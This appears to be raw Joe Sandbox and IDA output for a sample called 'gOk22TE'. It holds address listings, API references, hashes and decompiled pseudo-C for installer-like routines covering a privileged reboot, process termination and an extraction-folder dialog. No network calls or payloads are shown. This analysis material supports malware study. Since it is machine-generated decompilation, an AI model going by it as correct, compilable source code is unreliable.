                                                                                                                                                                                                                                                0x010e5e24
                                                                                                                                                                                                                                                0x010e5e24
                                                                                                                                                                                                                                                0x010e5e2c
                                                                                                                                                                                                                                                0x010e5e47
                                                                                                                                                                                                                                                0x010e5e4a
                                                                                                                                                                                                                                                0x010e61d2
                                                                                                                                                                                                                                                0x010e61e2
                                                                                                                                                                                                                                                0x010e61e7
                                                                                                                                                                                                                                                0x010e61ee
                                                                                                                                                                                                                                                0x010e61f1
                                                                                                                                                                                                                                                0x010e61f1
                                                                                                                                                                                                                                                0x010e61f8
                                                                                                                                                                                                                                                0x010e61f8
                                                                                                                                                                                                                                                0x010e5e50
                                                                                                                                                                                                                                                0x010e5e53
                                                                                                                                                                                                                                                0x010e6109
                                                                                                                                                                                                                                                0x010e611f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6125
                                                                                                                                                                                                                                                0x010e6137
                                                                                                                                                                                                                                                0x010e613a
                                                                                                                                                                                                                                                0x010e613c
                                                                                                                                                                                                                                                0x010e613e
                                                                                                                                                                                                                                                0x010e613e
                                                                                                                                                                                                                                                0x010e6141
                                                                                                                                                                                                                                                0x010e6141
                                                                                                                                                                                                                                                0x010e6143
                                                                                                                                                                                                                                                0x010e6144
                                                                                                                                                                                                                                                0x010e614a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6150
                                                                                                                                                                                                                                                0x010e6152
                                                                                                                                                                                                                                                0x010e615c
                                                                                                                                                                                                                                                0x010e6170
                                                                                                                                                                                                                                                0x010e6172
                                                                                                                                                                                                                                                0x010e617c
                                                                                                                                                                                                                                                0x010e6190
                                                                                                                                                                                                                                                0x010e6190
                                                                                                                                                                                                                                                0x010e6196
                                                                                                                                                                                                                                                0x010e61a5
                                                                                                                                                                                                                                                0x010e5ec3
                                                                                                                                                                                                                                                0x010e5ecc
                                                                                                                                                                                                                                                0x010e5ed4
                                                                                                                                                                                                                                                0x010e5ed6
                                                                                                                                                                                                                                                0x010e5edc
                                                                                                                                                                                                                                                0x010e5edf
                                                                                                                                                                                                                                                0x010e5eea
                                                                                                                                                                                                                                                0x010e5eed
                                                                                                                                                                                                                                                0x010e5f3f
                                                                                                                                                                                                                                                0x010e5f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5eef
                                                                                                                                                                                                                                                0x010e5eef
                                                                                                                                                                                                                                                0x010e5ef2
                                                                                                                                                                                                                                                0x010e5f34
                                                                                                                                                                                                                                                0x010e5ef4
                                                                                                                                                                                                                                                0x010e5ef4
                                                                                                                                                                                                                                                0x010e5ef7
                                                                                                                                                                                                                                                0x010e5f2b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5ef9
                                                                                                                                                                                                                                                0x010e5ef9
                                                                                                                                                                                                                                                0x010e5efc
                                                                                                                                                                                                                                                0x010e5f22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5efe
                                                                                                                                                                                                                                                0x010e5eff
                                                                                                                                                                                                                                                0x010e5f02
                                                                                                                                                                                                                                                0x010e5f16
                                                                                                                                                                                                                                                0x010e5f04
                                                                                                                                                                                                                                                0x010e5f07
                                                                                                                                                                                                                                                0x010e5f0d
                                                                                                                                                                                                                                                0x010e5f46
                                                                                                                                                                                                                                                0x010e5f46
                                                                                                                                                                                                                                                0x010e5f09
                                                                                                                                                                                                                                                0x010e5f09
                                                                                                                                                                                                                                                0x010e5f09
                                                                                                                                                                                                                                                0x010e5f07
                                                                                                                                                                                                                                                0x010e5f02
                                                                                                                                                                                                                                                0x010e5efc
                                                                                                                                                                                                                                                0x010e5ef7
                                                                                                                                                                                                                                                0x010e5ef2
                                                                                                                                                                                                                                                0x010e5f4c
                                                                                                                                                                                                                                                0x010e5f4e
                                                                                                                                                                                                                                                0x010e5f50
                                                                                                                                                                                                                                                0x010e5f54
                                                                                                                                                                                                                                                0x010e5ed4
                                                                                                                                                                                                                                                0x010e5ea2
                                                                                                                                                                                                                                                0x010e5ea4
                                                                                                                                                                                                                                                0x010e5eaf
                                                                                                                                                                                                                                                0x010e5eaf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e79
                                                                                                                                                                                                                                                0x010e5e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e83
                                                                                                                                                                                                                                                0x010e5e83
                                                                                                                                                                                                                                                0x010e5e83
                                                                                                                                                                                                                                                0x010e5e85
                                                                                                                                                                                                                                                0x010e5e85
                                                                                                                                                                                                                                                0x010e5e8e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5e94
                                                                                                                                                                                                                                                0x010e5e8e
                                                                                                                                                                                                                                                0x010e5e7d
                                                                                                                                                                                                                                                0x010e5e77
                                                                                                                                                                                                                                                0x010e5e6e
                                                                                                                                                                                                                                                0x010e5e65
                                                                                                                                                                                                                                                0x010e5e5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5dd0
                                                                                                                                                                                                                                                0x010e5dd0
                                                                                                                                                                                                                                                0x010e5dd0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5dd0
                                                                                                                                                                                                                                                0x010e5dce
                                                                                                                                                                                                                                                0x010e5dca
                                                                                                                                                                                                                                                0x010e5dba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d00
                                                                                                                                                                                                                                                0x010e5dd9
                                                                                                                                                                                                                                                0x010e5e04
                                                                                                                                                                                                                                                0x010e61fe
                                                                                                                                                                                                                                                0x010e5e0a
                                                                                                                                                                                                                                                0x010e5e0c
                                                                                                                                                                                                                                                0x010e5e17
                                                                                                                                                                                                                                                0x010e5e17
                                                                                                                                                                                                                                                0x010e5e04
                                                                                                                                                                                                                                                0x010e6200
                                                                                                                                                                                                                                                0x010e6200
                                                                                                                                                                                                                                                0x00000000

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 010E5CEE
• GetModuleFileNameA.KERNEL32(010E8B3E,00000104,00000000,?,?), ref: 010E5DFC
• CharUpperA.USER32(?), ref: 010E5E3E
• CharUpperA.USER32(-00000052), ref: 010E5EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010E5F6F
• CharUpperA.USER32(?), ref: 010E5FA7
• CharUpperA.USER32(-0000004E), ref: 010E6008
• CharUpperA.USER32(?), ref: 010E60AA
• CloseHandle.KERNEL32(00000000,010E1140,00000000,00000040,00000000), ref: 010E61F1
• ExitProcess.KERNEL32 ref: 010E61F8
Strings
Memory Dump Source
• Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
• Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$"$:$RegServer
• API String ID: 1203814774-25366791
• Opcode ID: 06a37dbc6bb3dd23bdb3db9383eb83fefdb1bab402b54d24f447a1368cf0905a
• Instruction ID: 4d1d7668cb53b73fbf899846024cc30998f6d7bad23f86839eee7e095a2f5fe3
• Opcode Fuzzy Hash: 06a37dbc6bb3dd23bdb3db9383eb83fefdb1bab402b54d24f447a1368cf0905a
• Instruction Fuzzy Hash: 29D17035A082555EEFBA8A3F9C4C3FA3FF19B1530CF0849DAD5D6DA145D67689828F00
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                                                                                                                			E010E1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                                                                				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                                				int _t28;
                                                                                                                                                                                                                                                				signed char _t30;
                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t41 = __esi;
                                                                                                                                                                                                                                                				_t38 = __edi;
                                                                                                                                                                                                                                                				_t30 = __ecx;
                                                                                                                                                                                                                                                				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                                						if( *0x10e9a40 != 0) {
                                                                                                                                                                                                                                                							_pop(_t30);
                                                                                                                                                                                                                                                							_t44 = _t46;
                                                                                                                                                                                                                                                							_t13 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                                							_push(_t38);
                                                                                                                                                                                                                                                							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                                								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                                								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                                								_v12 = 2;
                                                                                                                                                                                                                                                								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                                								CloseHandle(_v28);
                                                                                                                                                                                                                                                								_t41 = _t41;
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								if(_t21 != 0) {
                                                                                                                                                                                                                                                									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                                										_t25 = 1;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t37 = 0x4f7;
                                                                                                                                                                                                                                                										goto L3;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t37 = 0x4f6;
                                                                                                                                                                                                                                                									goto L4;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t37 = 0x4f5;
                                                                                                                                                                                                                                                								L3:
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								L4:
                                                                                                                                                                                                                                                								_push(0x10);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								E010E44B9(0, _t37);
                                                                                                                                                                                                                                                								_t25 = 0;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_pop(_t40);
                                                                                                                                                                                                                                                							return E010E6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t37 = 0x522;
                                                                                                                                                                                                                                                						_t28 = E010E44B9(0, 0x522, 0x10e1140, 0, 0x40, 4);
                                                                                                                                                                                                                                                						if(_t28 != 6) {
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					__eax = E010E1EA7(__ecx);
                                                                                                                                                                                                                                                					if(__eax != 2) {
                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                						return _t28;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                0x010e1f14
                                                                                                                                                                                                                                                0x010e1f16
                                                                                                                                                                                                                                                0x010e1f17
                                                                                                                                                                                                                                                0x010e1f1a
                                                                                                                                                                                                                                                0x010e1f1f
                                                                                                                                                                                                                                                0x010e1f1f
                                                                                                                                                                                                                                                0x010e1f86
                                                                                                                                                                                                                                                0x010e1f8f
                                                                                                                                                                                                                                                0x010e1fcf
                                                                                                                                                                                                                                                0x010e1fd3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1fd3
                                                                                                                                                                                                                                                0x010e1fa9
                                                                                                                                                                                                                                                0x010e1fb4
                                                                                                                                                                                                                                                0x010e1fbb
                                                                                                                                                                                                                                                0x010e1fc3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1fc3
                                                                                                                                                                                                                                                0x010e1f9a
                                                                                                                                                                                                                                                0x010e1f9a
                                                                                                                                                                                                                                                0x010e1fa2
                                                                                                                                                                                                                                                0x010e1fd9
                                                                                                                                                                                                                                                0x010e1fda
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1fa2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010E1EFB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 010E1F02
                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 010E1FD3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                • Opcode ID: 9d9aa912a8c6d53c284000c2961bcedb2787d103bde2a9ed8146bc52327a2729
                                                                                                                                                                                                                                                • Instruction ID: f1085c14d9b5bb200b842003d64a3963fad5068585b62586bb81ad08b2ea23ca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d9aa912a8c6d53c284000c2961bcedb2787d103bde2a9ed8146bc52327a2729
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1021D6B1B40205AEDB305AA79C4DFBF7AF8EB99B51F100059FA82DA185D779C80183A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                                				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                                0x010e6cf7
                                                                                                                                                                                                                                                0x010e6d00
                                                                                                                                                                                                                                                0x010e6d19

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010E6E26,010E1000), ref: 010E6CF7
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(010E6E26,?,010E6E26,010E1000), ref: 010E6D00
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,010E6E26,010E1000), ref: 010E6D0B
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,010E6E26,010E1000), ref: 010E6D12
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                                                                                                                • Opcode ID: 4256383c90560ef298ee571f180b28767e999ef690b8cbd7222af590c038e8df
                                                                                                                                                                                                                                                • Instruction ID: 134a8639d65a58b90c3bf0469e1580467ebce5c6cc1869e1ed42b328be7a0bd5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4256383c90560ef298ee571f180b28767e999ef690b8cbd7222af590c038e8df
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94D0C932200108FBDB202BE2E80CA593FA8EB8DA92F454085F3598B004CA3BC4518B51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                			E010E3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				int _t20;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				int _t23;
                                                                                                                                                                                                                                                				char _t24;
                                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                                				int _t27;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                                				int _t38;
                                                                                                                                                                                                                                                				int _t39;
                                                                                                                                                                                                                                                				void* _t42;
                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                				CHAR* _t49;
                                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                				struct HWND__* _t64;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t64 = _a4;
                                                                                                                                                                                                                                                				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t6 == 0) {
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					L38:
                                                                                                                                                                                                                                                					EndDialog(_t64, ??);
                                                                                                                                                                                                                                                					L39:
                                                                                                                                                                                                                                                					__eflags = 1;
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t42 = 1;
                                                                                                                                                                                                                                                				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                                				if(_t10 == 0) {
                                                                                                                                                                                                                                                					E010E43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                                					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                                					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                                					__eflags =  *0x10e9a40 - _t42; // 0x3
                                                                                                                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                                                                                                                						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L36:
                                                                                                                                                                                                                                                					return _t42;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t10 == _t42) {
                                                                                                                                                                                                                                                					_t20 = _a12 - 1;
                                                                                                                                                                                                                                                					__eflags = _t20;
                                                                                                                                                                                                                                                					if(_t20 == 0) {
                                                                                                                                                                                                                                                						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10e91e4, 0x104);
                                                                                                                                                                                                                                                						__eflags = _t21;
                                                                                                                                                                                                                                                						if(_t21 == 0) {
                                                                                                                                                                                                                                                							L32:
                                                                                                                                                                                                                                                							_t58 = 0x4bf;
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0x10);
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							L25:
                                                                                                                                                                                                                                                							E010E44B9(_t64, _t58);
                                                                                                                                                                                                                                                							goto L39;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t49 = 0x10e91e4;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t23 =  *_t49;
                                                                                                                                                                                                                                                							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                                							__eflags = _t23;
                                                                                                                                                                                                                                                						} while (_t23 != 0);
                                                                                                                                                                                                                                                						__eflags = _t49 - 0x10e91e5 - 3;
                                                                                                                                                                                                                                                						if(_t49 - 0x10e91e5 < 3) {
                                                                                                                                                                                                                                                							goto L32;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t24 =  *0x10e91e5; // 0x3a
                                                                                                                                                                                                                                                						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                                						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                                							L21:
                                                                                                                                                                                                                                                							_t25 = GetFileAttributesA(0x10e91e4);
                                                                                                                                                                                                                                                							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                                							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                								L26:
                                                                                                                                                                                                                                                								E010E658A(0x10e91e4, 0x104, 0x10e1140);
                                                                                                                                                                                                                                                								_t27 = E010E58C8(0x10e91e4);
                                                                                                                                                                                                                                                								__eflags = _t27;
                                                                                                                                                                                                                                                								if(_t27 != 0) {
                                                                                                                                                                                                                                                									__eflags =  *0x10e91e4 - 0x5c;
                                                                                                                                                                                                                                                									if( *0x10e91e4 != 0x5c) {
                                                                                                                                                                                                                                                										L30:
                                                                                                                                                                                                                                                										_t30 = E010E597D(0x10e91e4, 1, _t64, 1);
                                                                                                                                                                                                                                                										__eflags = _t30;
                                                                                                                                                                                                                                                										if(_t30 == 0) {
                                                                                                                                                                                                                                                											L35:
                                                                                                                                                                                                                                                											_t42 = 1;
                                                                                                                                                                                                                                                											__eflags = 1;
                                                                                                                                                                                                                                                											goto L36;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										L31:
                                                                                                                                                                                                                                                										_t42 = 1;
                                                                                                                                                                                                                                                										EndDialog(_t64, 1);
                                                                                                                                                                                                                                                										goto L36;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									__eflags =  *0x10e91e5 - 0x5c;
                                                                                                                                                                                                                                                									if( *0x10e91e5 == 0x5c) {
                                                                                                                                                                                                                                                										goto L31;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0x10);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_t58 = 0x4be;
                                                                                                                                                                                                                                                								goto L25;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t32 = E010E44B9(_t64, 0x54a, 0x10e91e4, 0, 0x20, 4);
                                                                                                                                                                                                                                                							__eflags = _t32 - 6;
                                                                                                                                                                                                                                                							if(_t32 != 6) {
                                                                                                                                                                                                                                                								goto L35;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t33 = CreateDirectoryA(0x10e91e4, 0);
                                                                                                                                                                                                                                                							__eflags = _t33;
                                                                                                                                                                                                                                                							if(_t33 != 0) {
                                                                                                                                                                                                                                                								goto L26;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0x10);
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                							_push(0x10e91e4);
                                                                                                                                                                                                                                                							_t58 = 0x4cb;
                                                                                                                                                                                                                                                							goto L25;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags =  *0x10e91e4 - 0x5c;
                                                                                                                                                                                                                                                						if( *0x10e91e4 != 0x5c) {
                                                                                                                                                                                                                                                							goto L32;
                                                                                                                                                                                                                                                						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x10e9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x10e9a3c, 0x3e8, 0x10e8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E010E4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10e87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E010E44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                                0x010e3367
                                                                                                                                                                                                                                                0x010e3369
                                                                                                                                                                                                                                                0x010e336a
                                                                                                                                                                                                                                                0x010e336b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e336b
                                                                                                                                                                                                                                                0x010e331c
                                                                                                                                                                                                                                                0x010e3323
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3329
                                                                                                                                                                                                                                                0x010e332b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e332b
                                                                                                                                                                                                                                                0x010e324c
                                                                                                                                                                                                                                                0x010e324c
                                                                                                                                                                                                                                                0x010e324f
                                                                                                                                                                                                                                                0x010e32c8
                                                                                                                                                                                                                                                0x010e32ce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e32ce
                                                                                                                                                                                                                                                0x010e3251
                                                                                                                                                                                                                                                0x010e3256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3271
                                                                                                                                                                                                                                                0x010e3277
                                                                                                                                                                                                                                                0x010e3279
                                                                                                                                                                                                                                                0x010e3298
                                                                                                                                                                                                                                                0x010e329d
                                                                                                                                                                                                                                                0x010e329f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e32b0
                                                                                                                                                                                                                                                0x010e32b6
                                                                                                                                                                                                                                                0x010e32b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e32be
                                                                                                                                                                                                                                                0x010e3280
                                                                                                                                                                                                                                                0x010e3289
                                                                                                                                                                                                                                                0x010e328e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e328e
                                                                                                                                                                                                                                                0x010e327b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e327b
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000003E8,010E8598,00000200), ref: 010E3271
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 010E33E2
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 010E33F7
